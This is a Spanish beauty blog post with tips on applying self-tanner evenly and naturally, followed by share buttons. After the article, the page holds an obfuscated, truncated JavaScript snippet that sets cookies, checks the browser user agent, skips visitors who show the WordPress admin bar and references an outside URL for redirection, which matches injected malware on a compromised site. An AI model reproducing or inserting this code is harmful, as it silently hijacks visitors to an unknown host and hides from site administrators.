Aunque estemos en verano, no todo el mundo tiene el tiempo ni la oportunidad de poder broncear su piel. Y nos damos cuenta que nuestra piel tiene un tono nada favorecedor, un poco blanco en contraste con los demás. Para ello existe la solución de los autobronceadores!!!

¿CÓMO USAR TU AUTOBRONCEADOR?

Los autobronceadores consiguen, en tan sólo unos instantes, cambiar el tono de tu piel, para que tu rostro y tu cuerpo muestren con un color radiante y muy saludable. Sin embargo, no es bueno abusar del producto ya que si aplicas demasiada cantidad, notarás un tono extremadamente artificial y muy anaranjado. ¡Apuesta por la naturalidad!

Una vez que te hayas decidido a usarlo, toma nota de los consejos para llevar a cabo una correcta aplicación y mostrar un tono perfecto, ¡cómo si hubieras pasado unos días en la playa!

1- Primero, debes exfolia tu piel, unos dos días antes de aplicar el autobronceador.

2-  Antes de aplicar el autobronceador, muestra una piel limpia y completamente seca.

3- A continuación, comienza a aplicarte el autobronceador de manera uniforme, evitando poner más producto en algunas partes de la piel, así evitarás que algunas zonas queden más oscuras que otras. Presta especial atención a tus rodillas, codos y dedos de las manos y los pies, ya que es dónde es más fácil que se acumule el producto y se produzcan las antiestéticas manchas.

4- Después, continúa aplicando el producto por todo tu rostro, antes del maquillaje. No te olvides del cuello, las orejas y otras áreas menos visibles para obtener un resultado lo más natural posible.

5- Por último, espera unos minutos a que el producto se seque y así no manches la ropa.

Finalmente y muy importante, no olvides lavarte bien las manos después de la aplicación, de lo contrario las palmas de las manos quedarán con un color anaranjado durante unos días.

¡Ánimo a broncearse sin miedo y a lucir un moreno igual que si hubieses ido a la playa!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone